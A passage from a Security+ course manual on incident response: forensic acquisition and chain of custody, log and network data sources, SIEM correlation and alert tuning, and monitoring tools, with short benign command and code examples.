plan to detect whether the malware is also infecting your systems.
The Hunt dashboards in Security Onion can help to determine whether a given alert affects a single
system only (as here), or whether it is more widespread across the network. (Screenshot courtesy of
Security Onion securityonion.net.)
Review Activity:
Incident Response
Topic 12B
Digital Forensics
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12B
Legal hold refers to the requirement that information that may be relevant to a
court case be preserved. Information subject to legal hold might be defined by regulators
or industry best practice, or there may be a litigation notice from law enforcement
or lawyers pursuing a civil action. This means that computer systems may be taken
as evidence, with all the obvious disruption to a network that entails. A company
subject to legal hold will usually have to suspend any routine deletion/destruction
of electronic or paper records and logs.
Acquisition
Acquisition is the process of obtaining a forensically clean copy of data from a
device seized as evidence. If the computer system or device is not owned by the
organization, there is the question of whether search or seizure is legally valid.
This impacts bring-your-own-device (BYOD) policies. For example, if an employee
is accused of fraud, you must verify that the employee’s equipment and data can
be legally seized and searched. Any mistake may make evidence gained from the
search inadmissible.
Data acquisition is also complicated by the fact that it is more difficult to capture
evidence from a digital crime scene than it is from a physical one. Some evidence
will be lost if the computer system is powered off; on the other hand, some
evidence may be unobtainable until the system is powered off. Additionally,
evidence may be lost depending on whether the system is shut down or “frozen” by
suddenly disconnecting the power.
Acquisition usually proceeds by using a tool to make an image from the data held
on the target device. An image can be acquired from either volatile or nonvolatile
storage. The general principle is to capture evidence in the order of volatility, from
more volatile to less volatile. The ISOC best practice guide to evidence collection
and archiving, published as RFC 3227 (tools.ietf.org/html/rfc3227), sets out the general order
as follows:
1. CPU registers and cache memory (including cache on disk controllers, graphics
cards, and so on).
2. Contents of nonpersistent system memory (RAM), including routing table,
ARP cache, and process table data.
3. Data on persistent mass storage devices (HDDs, SSDs, and flash memory
devices):
• Partition and file system blocks, slack space, and free space.
The Windows registry is mostly stored on disk, but there are keys—notably HKLM\
HARDWARE—that only ever exist in memory. The contents of the registry can be
analyzed via a memory dump.
Viewing the process list in a memory dump using the Volatility framework. (Screenshot Volatility
framework volatilityfoundation.org.)
A specialist hardware or software tool can capture the contents of memory while
the host is running. Unfortunately, this type of tool needs to be preinstalled as it
requires a kernel mode driver to dump any data of interest. Various commercial
tools are available to perform system memory acquisition on Windows. On Linux,
the Volatility framework includes a tool to install a kernel driver.
• Static acquisition by shutting down the host—this runs the risk that the
malware will detect the shutdown process and perform anti-forensics to try to
remove traces of itself.
Given sufficient time at the scene, an investigator might decide to perform both a
live and static acquisition. Whichever method is used, it is imperative to document
the steps taken and supply a timeline and video-recorded evidence of actions taken
to acquire the evidence.
There are many GUI imaging utilities, including those packaged with forensic suites.
If no specialist tool is available, on a Linux host, the dd command makes a copy of
an input file (if=) to an output file (of=). In the following, sda is the fixed drive:
dd if=/dev/sda of=/mnt/usbstick/backup.img
A more recent fork of dd is dcfldd, which provides additional features like multiple
output files and exact match verification.
Using dcfldd (a version of dd with additional forensics functionality created by the DoD) and
generating a hash of the source-disk data (sda).
Preservation
It is vital that the evidence collected at the crime scene conform to a valid timeline.
Digital information is susceptible to tampering, so access to the evidence must
be tightly controlled. Video recording the whole process of evidence acquisition
establishes the provenance of the evidence as deriving directly from the crime
scene.
To obtain a forensically sound image from nonvolatile storage, the capture tool
must not alter data or metadata (properties) on the source disk or file system. Data
acquisition would normally proceed by attaching the target device to a forensics
workstation or field capture device equipped with a write blocker. A write blocker
prevents any data on the disk or volume from being changed by filtering write
commands at the driver and OS level.
3. A second hash is then made of the image, which should match the original
hash of the media.
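These integrity steps can be sketched with standard Linux tools. The sketch below uses an ordinary file to stand in for the source media so it can run without privileges; a real acquisition would target a device such as /dev/sda through a write blocker, and the file names here are purely illustrative:

```shell
# Stand-in for the source media (illustrative only).
printf 'evidence data' > media.bin

# 1. Hash the source media before imaging.
sha256sum media.bin | awk '{print $1}' > before.sha256

# 2. Acquire a sector-by-sector image of the media.
dd if=media.bin of=image.bin bs=512 status=none

# 3. Hash the image; it should match the original hash of the media.
sha256sum image.bin | awk '{print $1}' > after.sha256
diff -q before.sha256 after.sha256 && echo "hashes match"
```

Any difference between the two hashes indicates that the image is not a faithful copy of the media and cannot be relied on as evidence.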
Chain of Custody
The host devices and media taken from the crime scene should be labeled, bagged,
and sealed, using tamper-evident bags. It is also appropriate to ensure that the
bags have antistatic shielding to reduce the possibility that data will be damaged
or corrupted on the electronic media by electrostatic discharge (ESD). Each piece
of evidence should be documented by a chain of custody form. Chain of custody
documentation records where, when, and who collected the evidence, who
subsequently handled it, and where it was stored. This establishes the integrity
and proper handling of evidence. When security breaches go to trial, the chain of
custody protects an organization against accusations that evidence has either been
tampered with or is different than it was when it was collected. Every person in the
chain who handles evidence must log the methods and tools they used.
The evidence should be stored in a secure facility; this not only means access
control, but also environmental control, so that the electronic systems are not
damaged by condensation, ESD, fire, and other hazards.
Reporting
Digital forensics reporting summarizes the significant contents of the digital data
and the conclusions from the investigator’s analysis. It is important to note that
strong ethical principles must guide forensics analysis:
• Analysis must be performed without bias. Conclusions and opinions should be
formed only from the direct evidence under analysis.
• Analysis methods must be repeatable by third parties with access to the same
evidence.
Defense counsel may try to use any deviation of good ethical and professional
behavior to have the forensics investigator’s findings dismissed.
Review Activity:
Digital Forensics
2. You’ve fulfilled your role in the forensic process, and now you plan on
handing the evidence over to an analysis team. What important process
should you observe during this transition, and why?
3. True or false? To ensure evidence integrity, you must make a hash of the
media before making an image.
4. You must recover the contents of the ARP cache as vital evidence of an
on-path attack. Should you shut down the PC and image the hard drive
to preserve it?
Topic 12C
Data Sources
Networks, hosts, and applications produce a very large amount of data via different
mechanisms. Identifying all these data sources and then scanning them for threat
indicators is a significant challenge for all types of organizations. As a security
professional, you must be able to identify and utilize appropriate data sources to
perform incident response as efficiently as possible. Typical data sources include
the following:
• Log files generated by the OS components of client and server host computers.
• Log files and alerts generated by endpoint security software installed on hosts.
This can include host-based intrusion detection, vulnerability scanning, antivirus,
and firewall security software.
The sheer diversity and size of data sources is a significant problem for
investigations. Organizations use security information and event management
(SIEM) tools to aggregate and correlate multiple data sources. This can be used as a
single source for agent dashboards and automated reports.
Issues posed by dealing with large amounts of data are often described as the "V's."
They include volume, velocity, variety, veracity, and value.
Dashboards
An event dashboard provides a console to work from for day-to-day incident
response. It provides a summary of information drawn from the underlying
data sources to support some work task. Separate dashboards can be created to
suit different purposes and audiences.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
Automated Reports
A SIEM can be used for two types of reporting:
• Alerts and alarms detect the presence of threat indicators in the data and can be
used to start incident cases. Day-to-day management of alert reporting forms a
large part of an analyst’s workload.
A SIEM will ship with a number of preconfigured dashboards and reports, but it will also
make tools available for creating custom reports. It is critical to tailor the information
presented in a dashboard or report to meet the needs and goals of its intended
audience. If the report simply contains an overwhelming amount of information or
irrelevant information, it will not be possible to quickly identify remediation actions.
Log Data
Log data is a critical resource for investigating security incidents. As well as the log
format, you must also consider the range of sources for log files, and know how to
determine what type of log file will best support any given investigation scenario.
• Event metadata is the source and time of the event. The source might include a
host or network address, a process name, and categorization/priority fields.
Accurate logging requires each host to be synchronized to the same date and time value
and format. Ideally, each host should also be configured to use the same time zone, or
to use a "neutral" zone, such as Coordinated Universal Time (UTC).
Windows hosts and applications can use Event Viewer format logging. Each event
has a header reporting the source, level, user, timestamp, category, keywords, and
host name.
Syslog provides an open format, protocol, and server software for logging event
messages. It is used by a very wide range of host types. For example, syslog
messages can be generated by switches, routers, and firewalls, as well as UNIX or
Linux servers and workstations.
A syslog message comprises a PRI code, a header, and a message part:
• The PRI code is calculated from the facility and a severity level.
• The header contains a timestamp, host name, app name, process ID, and
message ID fields.
• The message part contains a tag showing the source process plus content. The
format of the content is application dependent. It might use space- or comma-
delimited fields or name/value pairs.
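The PRI calculation can be checked with shell arithmetic. A PRI of 86, for instance, decodes to facility 10 (security/authorization messages) and severity 6 (informational):

```shell
# PRI = facility * 8 + severity, so the fields are recovered by
# integer division and remainder.
pri=86
facility=$((pri / 8))   # 10 = security/authorization (authpriv)
severity=$((pri % 8))   # 6 = informational
echo "facility=$facility severity=$severity"
# → facility=10 severity=6
```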
Log data can be kept and analyzed on each host individually, but most organizations
require better visibility into data sources and host monitoring. SIEM software can
offer a “single pane of glass” view of all network hosts and appliances by collecting
and aggregating logs from multiple sources. Logs can be collected via an agent
running on each host, or by using syslog (or similar) to forward event data.
• File system events record whether use of permissions to read or modify a file
was allowed or denied. As this would generate a huge amount of data if enabled
for all file system objects by default, file system auditing usually needs to be
explicitly configured.
Windows Logs
The three main Windows event log files are the following:
• Application—events generated by application processes, such as when there is a
crash, or when an app is installed or removed.
Linux Logs
Linux logging can be implemented differently for each distribution. Some
distributions use syslog to direct messages relating to a particular subsystem to
a flat text file. Other distributions use Journald as a unified logging system with
a binary, rather than plaintext, file format. Journald messages are read using the
journalctl command, but it can be configured to export some messages to
text files via syslog.
Some of the principal log files are as follows:
• /var/log/messages or /var/log/syslog stores all events generated
by the system. Some of these are copied to individual log files.
• The package manager log (apt, yum, or dnf, depending on the distro) stores
information about what software has been installed and updated.
Linux authentication log showing SSH remote access is enabled, failed authentication attempts for
root user, and successful login for lamp user.
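Events like these can be extracted from a flat syslog-format file with standard text tools. This sketch builds a small sample log with hypothetical hosts and addresses rather than reading a live /var/log/auth.log:

```shell
# Sample auth log entries (hypothetical hosts and addresses).
cat > auth.log <<'EOF'
Oct  9 10:01:22 web01 sshd[1042]: Failed password for root from 203.0.113.50 port 53211 ssh2
Oct  9 10:01:30 web01 sshd[1042]: Failed password for root from 203.0.113.50 port 53214 ssh2
Oct  9 10:02:05 web01 sshd[1050]: Accepted password for lamp from 10.1.0.20 port 40022 ssh2
EOF

# Count failed SSH authentication attempts.
grep -c 'Failed password' auth.log
# → 2
```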
macOS Logs
macOS uses a unified logging system, which can be accessed via the graphical
Console app, or the log command. The log command can be used with filters to
review security-related events, such as login (com.apple.login), app installs (com.
apple.install), and system policy violations (com.apple.syspolicy.exec).
Application Logs
An application log file is simply one that is managed by an application rather than
the OS. The application may use Event Viewer or syslog to write event data using
a standard format, or it might write log files to its own application directories in
whatever format the developer has selected.
In Windows Event Viewer, there is a specific application log, which can be written to by
any authenticated account. There are also separate custom application and service logs,
which are managed by specific processes. The app developer chooses which log to use,
or whether to implement a logging system without using Event Viewer. Check the product
documentation to find out where events for a particular software app are logged.
Endpoint Logs
An endpoint log is likely to refer to events monitored by security software running
on the host, rather than by the OS itself. This can include host-based firewalls and
intrusion detection, vulnerability scanners, and antivirus/antimalware protection
suites. Suites that integrate these functions into a single product are often referred
to as an endpoint protection platform (EPP), endpoint detection and response
(EDR), or extended detection and response (XDR). These security tools can be
directly integrated with a SIEM using agent-based software.
Summarizing events from endpoint protection logs can show overall threat levels,
such as amount of malware detected, number of host intrusion detection events,
and numbers of hosts with missing patches. Close analysis of detection events can
assist with attributing intrusion events to a specific actor, and developing threat
intelligence of tactics, techniques, and procedures.
Vulnerability Scans
While there is usually a summary report, a vulnerability scanner can be configured
to log each vulnerability detected to a SIEM. Vulnerabilities can include missing
patches and noncompliance with a baseline security configuration. The SIEM will be
able to retrieve a list of these logs for each host. Depending on the date of the last
scan, it may be difficult to identify from the log data which vulnerabilities have been
remediated, but in general terms this will provide useful information about whether a host is
properly configured.
Network Logs
Network logs are generated by appliances such as routers, firewalls, switches, and
access points. Log files will record the operation and status of the appliance itself—
the system log for the appliance—plus traffic and access logs recording network
behavior. For example, network appliance access logs might reveal the following
types of threat:
• A switch log might reveal an endpoint trying to use multiple MAC addresses to
perpetrate an on-path attack.
• An access point log could record disassociation events that indicate a threat actor
trying to attack the wireless network.
Excerpts from a typical SOHO router log as it restarts. The events show the router re-establishing
an Internet/WAN connection, updating the system date and time using Network Time Protocol
(NTP), running a firmware update check, and connecting a wireless client. The client is not initially
authenticated, probably as the user was entering the wrong passphrase.
Firewall Logs
Any firewall rule can be configured to generate an event whenever it is triggered.
As with most types of security data, this can quickly generate an overwhelming
number of events. It is also possible to configure log-only rules. Typically, firewall
logging will be used when testing a new rule or only enabled for high-impact rules.
A firewall audit event will record a date/timestamp, the interface on which the
rule was triggered, whether the rule matched incoming/ingress or outgoing/
egress traffic, and whether the packet was accepted or dropped. The event data
will also record packet information, such as source and destination address and
port numbers. This information can support investigation of host compromise.
For example, say that a host-based IDS reports that a malicious process on a local
server is attempting to connect to a particular port on an Internet host. The firewall
log could confirm whether the connection was allowed or denied, and identify
which rule potentially needs adjusting.
Firewall log showing what pass and block rules have been triggered, with source and destination
ports and IP addresses
As the log action is configured per-rule, it is possible that a single packet will trigger
multiple events.
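A firewall audit event of this kind can be parsed with standard text tools. The log line format below is hypothetical, but it carries the typical fields described above (timestamp, interface, direction, verdict, and source/destination socket addresses):

```shell
# A hypothetical firewall log entry.
line='2024-10-09T10:15:02Z eth0 ingress DROP src=203.0.113.50:4444 dst=10.1.0.5:3389'

# Extract the verdict and the source/destination socket addresses.
echo "$line" | awk '{print "verdict="$4, $5, $6}'
# → verdict=DROP src=203.0.113.50:4444 dst=10.1.0.5:3389
```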
IPS/IDS Logs
An IPS/IDS logs an event when a traffic pattern is matched to a rule. As this can
generate a very high volume of events, it might be appropriate to only log high
sensitivity/impact rules. As with firewall logging, a single packet might trigger
multiple rules.
An intrusion prevention system could additionally be configured to log shuns,
resets, and redirects in the same way as a firewall.
As with endpoint protection logs, summary event data from IDS/IPS can be
visualized in dashboard graphs to represent overall threat levels. Close analysis of
detection events can assist with attributing intrusion events to a specific actor, and
developing threat intelligence of TTPs.
Viewing the raw log message generated by a Suricata IDS alert in the Security Onion SIEM.
Packet Captures
Network traffic can provide valuable insights into potential breaches. Network
traffic is typically analyzed in detail at the level of individual frames or using
summary statistics of traffic flows and protocol usage.
A SIEM will store selected information from sensors installed to different points
on the network. Information captured from network packets can be aggregated
and summarized to show overall protocol usage and endpoint activity. On a
typical network, sensors are not configured to record all network traffic, as this
would generate a very considerable amount of data. More typically, only packets
that triggered a given firewall or IDS rule are recorded. SIEM software will usually
provide the ability to pivot from an event or alert summary to opening the
underlying packets in an analyzer.
On the other hand, given sufficient resources, a retrospective network analysis (RNA)
solution provides the means to record the totality of network events at either a packet
header or payload level.
Using the Wireshark packet analyzer to identify malicious executables being transferred
over the Windows file-sharing protocol. (Screenshot Wireshark wireshark.org.)
Metadata
Metadata comprises the properties of data as it is created by an application, stored on
media, or transmitted over a network. Each logged event has metadata, but a
number of other metadata sources are likely to be useful when investigating
incidents. Metadata can answer timeline questions, such as when and where a
breach occurred, and can contain other types of evidence.
File
File metadata is stored as attributes. The file system tracks when a file was created,
accessed, and modified. A file might be assigned a security attribute, such as
marking it as read-only or as a hidden or system file. The ACL attached to a file
showing its permissions represents another type of attribute. Finally, the file may
have extended attributes recording an author, copyright information, or tags for
indexing/searching.
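On a Linux host, the stat command (GNU coreutils) exposes these file system attributes directly; the file here is created purely for illustration:

```shell
# Create a file and read its metadata attributes: permissions, owner,
# and the modified/accessed timestamps tracked by the file system.
touch evidence.txt
stat -c 'perms=%a owner=%U modified=%y accessed=%x' evidence.txt
```

Where the file system supports extended attributes, tools such as getfattr can list author or tag information recorded alongside the standard attributes.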
Because metadata is uploaded to social media sites along with the media files it is
embedded in, it can reveal more information than the uploader intended. Metadata added
to media such as photos and videos can include the current location and time.
Web
When a client requests a resource from a web server, the server returns the
resource plus headers setting or describing its properties. Also, the client can
include headers in its request. One key use of headers is to transmit authorization
information, in the form of cookies. Headers describing the type of data returned
(text or binary, for instance) can also be of interest. The contents of headers can
be inspected using the standard tools built into web browsers. Header information
may also be logged by a web server.
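Captured response headers are simple name/value text and are easy to pick apart with standard tools. The header block below is a hypothetical example:

```shell
# A captured (hypothetical) HTTP response header block.
cat > headers.txt <<'EOF'
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=abc123; HttpOnly; Secure
EOF

# Extract the header describing the type of data returned.
awk -F': ' '/^Content-Type:/ {print $2}' headers.txt
# → text/html; charset=utf-8
```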
Email
An email’s Internet header contains address information for the recipient and
sender, plus details of the servers handling transmission of the message between
them. When an email is created, the mail user agent (MUA) creates an initial header
and forwards the message to a mail delivery agent (MDA). The MDA should perform
checks that the sender is authorized to issue messages from the domain. Assuming
the email isn’t being delivered locally at the same domain, the MDA adds or amends
its own header and then transmits the message to a message transfer agent (MTA).
The MTA routes the message to the recipient, with the message passing via one
or more additional MTAs, such as SMTP servers operated by ISPs or mail security
gateways. Each MTA adds information to the header.
Headers aren’t exposed to the user by most email applications. You can view and
copy headers from a mail client via a message properties/options/source command.
MTAs can add a lot of information in each received header, such as the results of
spam checking. If you use a plaintext editor to view the header, it can be difficult
to identify where each part begins and ends. Fortunately, there are plenty of tools
available to parse headers and display them in a more structured format. One
example is the Message Analyzer tool, available as part of the Microsoft Remote
Connectivity Analyzer (testconnectivity.microsoft.com/tests/o365). This will lay out
the hops that the message took more clearly and break out the headers added by
each MTA.
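Header parsing can be done locally too. Python's standard `email` module will unfold headers and return every `Received` header, which can then be reversed to follow the delivery path oldest-hop-first. The message below is a fabricated example.

```python
from email import message_from_string

raw_msg = (
    "Received: from mx2.example.net (mx2.example.net [203.0.113.7])\n"
    "\tby mail.victim.example; Mon, 1 Jan 2024 10:00:05 +0000\n"
    "Received: from sender-pc (unknown [198.51.100.9])\n"
    "\tby mx2.example.net; Mon, 1 Jan 2024 10:00:01 +0000\n"
    "From: alice@example.net\n"
    "To: bob@victim.example\n"
    "Subject: Invoice\n"
    "\n"
    "Body text\n"
)

msg = message_from_string(raw_msg)
# Received headers appear newest-first; reverse to follow the delivery path.
hops = list(reversed(msg.get_all("Received", [])))
for i, hop in enumerate(hops, 1):
    print(f"Hop {i}: {hop.split(';')[0]}")
```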
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
Review Activity:
Data Sources
3. True or false? It is not possible to set custom file system audit settings
when using security log data.
Topic 12D
Alerting and Monitoring Tools
There are many types of security controls that can be deployed to protect networks,
hosts, and data. One thing that all these controls have in common is that they
generate log data and alerts. Collecting and reviewing this output is one of the
principal cybersecurity challenges. As a security professional, you must be able to
explain the configuration and use of systems to manage data sources and provision
an effective monitoring and alerting system.
Wazuh SIEM dashboard—Configurable dashboards provide the high-level status view of network
security metrics. (Screenshot used with permission from Wazuh Inc.)
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
• Sensor—as well as log data, the SIEM might collect packet captures and traffic
flow data from sniffers. A sniffer can record network data using either the mirror
port functionality of a switch or some type of tap on the network media.
Agent configuration file for event sources to report to the Wazuh SIEM.
Log Aggregation
As distinct from collection, log aggregation refers to normalizing data from
different sources so that it is consistent and searchable. SIEM software features
connectors or plug-ins to interpret (or parse) data from distinct types of systems
and to account for differences between vendor implementations. Each agent,
collector, or sensor data source will require its own parser to identify attributes and
content that can be mapped to standard fields in the SIEM’s reporting and analysis
tools. Another important function is to normalize date/time zone differences to a
single timeline.
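The normalization step can be illustrated with a small sketch: two hypothetical parsers for different log formats each emit an event with its timestamp converted to UTC, so the events sort onto a single timeline. The log line formats are invented for the example.

```python
from datetime import datetime, timezone

def parse_syslog(line):
    # e.g. "2024-01-01T10:00:00+02:00 host sshd: Failed password"
    ts, _, rest = line.partition(" ")
    return datetime.fromisoformat(ts).astimezone(timezone.utc), rest

def parse_winevent(line):
    # e.g. "01/01/2024 08:00:00 UTC,4625,An account failed to log on"
    ts, _, rest = line.partition(",")
    dt = datetime.strptime(ts, "%d/%m/%Y %H:%M:%S UTC").replace(tzinfo=timezone.utc)
    return dt, rest

events = [parse_syslog("2024-01-01T10:00:00+02:00 host sshd: Failed password"),
          parse_winevent("01/01/2024 08:00:00 UTC,4625,An account failed to log on")]
events.sort(key=lambda e: e[0])
# Both events normalize to 08:00 UTC despite their different source formats.
```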
Note that these activities can be performed manually or automated using discrete tools
for each security appliance. The advantage of a SIEM is that it consolidates the activities
into a single management interface. This consolidated functionality is referred to as a
"single pane of glass" because of the enhanced visibility into a complex environment that
such software offers.
Alerting
A SIEM can then run correlation rules on indicators extracted from the data sources
to detect events that should be investigated as potential incidents. An analyst can
also filter or query the data based on the type of incident that has been reported.
Correlation means interpreting the relationship between individual data points to
diagnose incidents of significance to the security team. A SIEM correlation rule is
a statement that matches certain conditions. These rules use logical expressions,
such as AND and OR, and operators, such as == (matches), < (less than), >
(greater than), and in (contains). For example, a single-user login failure is not
a condition that should raise an alert. Multiple user login failures for the same
account, taking place within the space of one hour, is more likely to require
investigation and is a candidate for detection by a correlation rule.
Error.LoginFailure > 3 AND LoginFailure.User AND Duration < 1 hour
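The logic of this correlation rule can be sketched as code: raise an alert for any user account with more than three login failures inside a sliding one-hour window. The event data is hypothetical.

```python
from collections import defaultdict

def correlate_login_failures(events, threshold=3, window=3600):
    """events: iterable of (timestamp_seconds, user). Return users breaching the rule."""
    by_user = defaultdict(list)
    for ts, user in sorted(events):
        times = by_user[user]
        times.append(ts)
        # Discard failures that have fallen out of the sliding window.
        while times and ts - times[0] > window:
            times.pop(0)
    return {u for u, times in by_user.items() if len(times) > threshold}

events = [(0, "alice"), (600, "alice"), (1200, "alice"), (1800, "alice"),
          (0, "bob")]
print(correlate_login_failures(events))   # {'alice'}
```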
As well as correlation between indicators observed in the collected data, a SIEM is
likely to be configured with a threat intelligence feed. This means that data points
observed in the collected network data can be associated with known threat actor
indicators, such as IP addresses and domain names.
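A minimal sketch of this feed-matching idea follows; the feed entries and observed connections are fabricated examples using documentation address ranges.

```python
# Hypothetical threat intelligence feed, keyed by indicator type.
THREAT_FEED = {
    "ip": {"203.0.113.66", "198.51.100.200"},
    "domain": {"bad-c2.example"},
}

def match_indicators(observed):
    """observed: iterable of (kind, value). Return entries found in the feed."""
    return [(k, v) for k, v in observed if v in THREAT_FEED.get(k, set())]

observed = [("ip", "192.0.2.10"), ("ip", "203.0.113.66"),
            ("domain", "bad-c2.example")]
print(match_indicators(observed))
```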
Each alert will be dealt with by the incident response processes of analysis,
containment, eradication, and recovery. When used in conjunction with a SIEM, two
particular steps in alert response and remediation deserve particular attention:
• Validation during the analysis process is how the analyst decides whether the
alert is a true positive and needs to be treated as an incident. A false positive is
where an alert is generated, but there is no actual threat activity.
Alert response and remediation steps will often be guided by a playbook that assists
the analyst with applying all incident response processes for a given scenario. One
of the advantages of SIEM and advanced security orchestration, automation,
and response (SOAR) solutions is to fully or partially automate validation and
remediation. For example, a quarantine action could be available as a mouse-click
action via an integration with a firewall or endpoint protection product. Validation
is made easier by being able to correlate event data to known threat data and pivot
between sources, such as inspecting the packets that triggered a particular IDS alert.
Reporting
Reporting is a managerial control that provides insight into the status of the security
system. A SIEM can assist with reporting activity by exporting summary statistics
and graphs. Report formats and contents are usually tailored to meet the needs of
different audiences:
Determining which metrics are most useful for reporting is a perennial
challenge. The following types illustrate some common use cases for reporting:
• Authentication data, such as failed login attempts, and critical file audit data.
• Incident case management statistics, such as overall volume, open cases, time to
resolve, and so on.
Archiving
A SIEM can enact a retention policy so that historical log and network traffic data is
kept for a defined period. This allows for retrospective incident and threat hunting,
and can be a valuable source of forensic evidence. It can also meet compliance
requirements to hold archives of security information. SIEM performance will
degrade if an excessive amount of data is kept available for live analysis. A log
rotation scheme can be configured to move outdated information to archive storage.
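A log rotation scheme of this kind can be sketched as a simple retention job that moves files older than a cutoff out of live storage. The function below is a minimal illustration with hypothetical paths, not a production rotation tool.

```python
import os
import shutil
import time

def rotate_logs(live_dir, archive_dir, max_age_days=90):
    """Move files whose modification time exceeds the retention window."""
    cutoff = time.time() - max_age_days * 86400
    os.makedirs(archive_dir, exist_ok=True)
    moved = []
    for name in os.listdir(live_dir):
        path = os.path.join(live_dir, name)
        if os.path.isfile(path) and os.path.getmtime(path) < cutoff:
            shutil.move(path, os.path.join(archive_dir, name))
            moved.append(name)
    return moved
```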
Alert Tuning
Correlation rules are likely to assign a criticality level to each match. Examples
include the following:
• Log only—an event is produced and added to the SIEM’s database, but it is
classified automatically and no notification is raised.
Alert tuning is necessary to reduce the incidence of false positives. False positive
alerts and alarms waste analysts’ time and reduce productivity. Alert fatigue refers
to a situation in which analysts are so consumed with dismissing numerous
low-priority alerts that they miss a high-impact alert that could have
prevented a data breach. Analysts can become more preoccupied with finding
a quick reason to dismiss an alert than with properly evaluating it. Reducing
false positives is difficult, however, firstly because there isn’t a simple dial to turn for
overall sensitivity, and secondly because reducing the number of rules that produce
alerts increases the risk of false negatives.
A false negative is where the system fails to generate an alert about malicious
indicators that are present in the data source. False negatives are a serious
weakness in the security system. One of the purposes of threat hunting activity is
to identify whether the monitoring system is subject to false negatives.
There is also a concept of true negatives. This is a measure of events that the system
has properly allowed. Metrics for false and true negatives can be used to assess the
performance of the alerting system.
Some of the techniques used to manage alert tuning include the following:
• Refining detection rules and muting alert levels—If a certain rule is generating
multiple dashboard notifications, the parameters of the rule can be adjusted to
reduce this, perhaps by adding more correlation factors. Alternatively, the alert
can be muted to log-only status, or configured so that it only produces a single
notification for every 10 or 100 events.
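The "one notification per N events" idea described above can be sketched as a small throttle keyed by rule name. The rule name and counts here are hypothetical.

```python
from collections import Counter

class AlertThrottle:
    """Raise one notification per `every` matches of a given rule."""
    def __init__(self, every=100):
        self.every = every
        self.counts = Counter()

    def should_notify(self, rule):
        """Return True on the 1st, (N+1)th, (2N+1)th ... match of a rule."""
        self.counts[rule] += 1
        return (self.counts[rule] - 1) % self.every == 0

throttle = AlertThrottle(every=100)
fired = sum(throttle.should_notify("noisy-rule") for _ in range(250))
print(fired)   # 3 notifications for 250 matching events
```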
Monitoring Infrastructure
Managerial reports can be used for day-to-day monitoring of computer resources
and network infrastructure. Not all issues can be identified from alerts and
alarms. Running a custom report allows a manager to verify results of logging and
monitoring activity to ensure that the network remains in a secure state.
Network Monitors
As distinct from network traffic monitoring, a network monitor collects data
about network infrastructure appliances, such as switches, access points, routers,
and firewalls. This is used to monitor load status for CPU/memory, state tables, disk
capacity, fan speeds/temperature, network link utilization/error statistics, and so
on. Another important function is a heartbeat message to indicate availability.
This data might be collected using the Simple Network Management Protocol
(SNMP). An SNMP trap informs the management system of a notable event, such
as port failure, chassis overheating, power failure, or excessive CPU utilization. The
threshold for triggering traps can be set for each value. This provides a mechanism
for alerts and alarms for hardware issues.
As well as supporting availability, network monitoring might reveal unusual
conditions that could point to some kind of attack.
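The per-value threshold idea behind trap generation can be sketched generically, without an SNMP library: polled metrics are compared against configured thresholds and any breach raises an alert. Device names, metric names, and thresholds here are fabricated.

```python
# Hypothetical per-metric thresholds, as might be configured on a network monitor.
THRESHOLDS = {"cpu_pct": 90, "temp_c": 75, "link_errors": 100}

def check_device(name, metrics):
    """Return alert strings for every polled metric exceeding its threshold."""
    return [f"{name}: {k}={v} exceeds {THRESHOLDS[k]}"
            for k, v in metrics.items()
            if k in THRESHOLDS and v > THRESHOLDS[k]]

alerts = check_device("sw-core-01", {"cpu_pct": 97, "temp_c": 60, "link_errors": 240})
print(alerts)
```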
NetFlow
A flow collector is a means of recording metadata and statistics about network
traffic rather than recording each frame. Network traffic and flow data may come
from a wide variety of sources (or probes), such as switches, routers, firewalls, and
web proxies. Flow analysis tools can provide features such as the following:
• Highlighting of trends and patterns in traffic generated by particular applications,
hosts, and ports.
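Trend analysis of this kind works on flow metadata rather than packet contents. The sketch below aggregates hypothetical flow records by destination port to rank traffic volume, the sort of summary a flow analysis tool presents.

```python
from collections import defaultdict

def top_ports(flows, n=2):
    """flows: iterable of (src, dst, dst_port, bytes). Rank ports by byte volume."""
    totals = defaultdict(int)
    for _src, _dst, port, nbytes in flows:
        totals[port] += nbytes
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)[:n]

# Fabricated flow records using documentation address ranges.
flows = [("10.0.0.5", "192.0.2.1", 443, 50_000),
         ("10.0.0.6", "192.0.2.1", 443, 30_000),
         ("10.0.0.5", "198.51.100.2", 25, 4_000)]
print(top_ports(flows))   # [(443, 80000), (25, 4000)]
```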
Logs typically associate an action with a particular user. This is one of the reasons why it
is critical that users not share login details. If a user account is compromised, there is no
means of tying events in the log to the actual attacker.
Vulnerability Scanners
A vulnerability scanner will report the total number of unmitigated vulnerabilities
for each host. Consolidating these results can show the status of hosts across the
whole network and highlight problems with a particular patch or configuration.
Antivirus
Most hosts should be running some type of antivirus (A-V) software. While
the A-V moniker remains popular, these suites are better conceived of as endpoint
protection platforms (EPPs) or next-gen A-V. These detect malware by signature
regardless of type, though detection rates can vary quite widely from product to
product. Many suites also integrate with user and entity behavior analytics (UEBA)
and use AI-backed analysis to detect threat actor behavior that has bypassed
malware signature matching.
Antivirus will usually be configured to block a detected threat automatically. The
software can be configured to generate a dashboard alert or log via integration with
a SIEM.
Benchmarks
One of the functions of a vulnerability scan is to assess the configuration of security
controls and application settings and permissions compared to established
benchmarks.
The scanner might try to identify whether there is a lack of controls that might be
considered necessary or whether there is any misconfiguration of the system that
would make the controls less effective or ineffective, such as antivirus software
not being updated, or management passwords left configured to the default. This
sort of testing requires specific information about best practices in configuring
the particular application or security control. These best practices are provided by
listing the controls and appropriate configuration settings in a template.
Security Content Automation Protocol (SCAP) allows compatible scanners to
determine whether a computer meets a configuration baseline. SCAP uses several
components to accomplish this function, but some of the most important are the
following:
• Open Vulnerability and Assessment Language (OVAL)—an XML schema
for describing system security state and querying vulnerability reports and
information.
Some scanners measure systems and configuration settings against best practice
frameworks. This is referred to as a compliance scan. This might be necessary
for regulatory compliance, or you might voluntarily want to conform to externally
agreed upon standards of best practice.
Review Activity:
Alerting and Monitoring Tools
3. Your company has implemented a SIEM but found that there is no parser
for logs generated by the network’s UTM gateway. Why is a parser
necessary?
4. Your manager has asked you to prepare a summary of the activities that
support alerting and monitoring. You have sections for log aggregation,
alerting, scanning, reporting, and alert response and remediation/
validation (including quarantine and alert tuning). Following the
CompTIA Security+ exam objectives, which additional activity should you
cover?
Lesson 12
Summary
You should be able to explain the process and procedures involved in effective
